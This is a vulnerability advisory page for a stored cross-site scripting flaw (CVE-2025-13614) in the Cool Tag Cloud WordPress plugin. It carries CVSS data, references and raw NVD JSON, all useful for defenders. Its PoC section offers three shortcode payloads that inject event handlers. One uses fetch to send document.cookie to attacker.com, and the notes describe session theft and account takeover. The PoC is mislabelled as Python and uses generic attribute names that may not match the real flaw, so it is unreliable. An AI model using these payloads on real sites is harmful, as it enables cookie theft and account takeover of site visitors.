CVE-2025-13614

Description

The Cool Tag Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cool_tag_cloud' shortcode in all versions up to, and including, 2.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Cool Tag Cloud插件 <= 2.29

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-13614 PoC - Cool Tag Cloud Plugin Stored XSS -->
<!-- Authenticated Contributor+ Role Required -->

<!-- Method 1: Via WordPress Shortcode in Post/Page -->
[cool_tag_cloud min_font_size='8' max_font_size='36' font_unit='px' 
number='45' tag_operator='AND' taxonomy='post_tag' 
hide_empty='1' echo='0' 
xxx='" onmouseover="alert(document.domain)" style="background:url(javascript:alert(1))" x="']

<!-- Method 2: Direct attribute injection -->
[cool_tag_cloud orderby='count' order='DESC' 
custom_css_class='" onfocus="alert(document.cookie)" autofocus="']

<!-- Method 3: Event handler injection -->
[cool_tag_cloud show_post_count='1' 
linkify='1' 
separator=', ' 
color='red" onload="fetch(`https://attacker.com/steal?c=`+document.cookie)"']

<!-- Notes:
1. Attacker needs contributor role or higher
2. Injected script executes when any user visits the page
3. Can be used to steal session cookies and perform account takeover
4. Recommended fix: Update to version > 2.29 with proper sanitization
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13614
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13614
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13614/
[4] VulDB https://vuldb.com/cve/CVE-2025-13614
[5] http://plugins.trac.wordpress.org/browser/cool-tag-cloud/trunk/cool-tag-cloud.php?marks=798-799#L682
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/eac56190-4f81-464d-9737-ae2e3d4b0d0d?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13614", "sourceIdentifier": "[email protected]", "published": "2025-12-05T10:15:46.810", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Cool Tag Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cool_tag_cloud' shortcode in all versions up to, and including, 2.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://plugins.trac.wordpress.org/browser/cool-tag-cloud/trunk/cool-tag-cloud.php?marks=798-799#L682", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eac56190-4f81-464d-9737-ae2e3d4b0d0d?source=cve", "source": "[email protected]"}]}}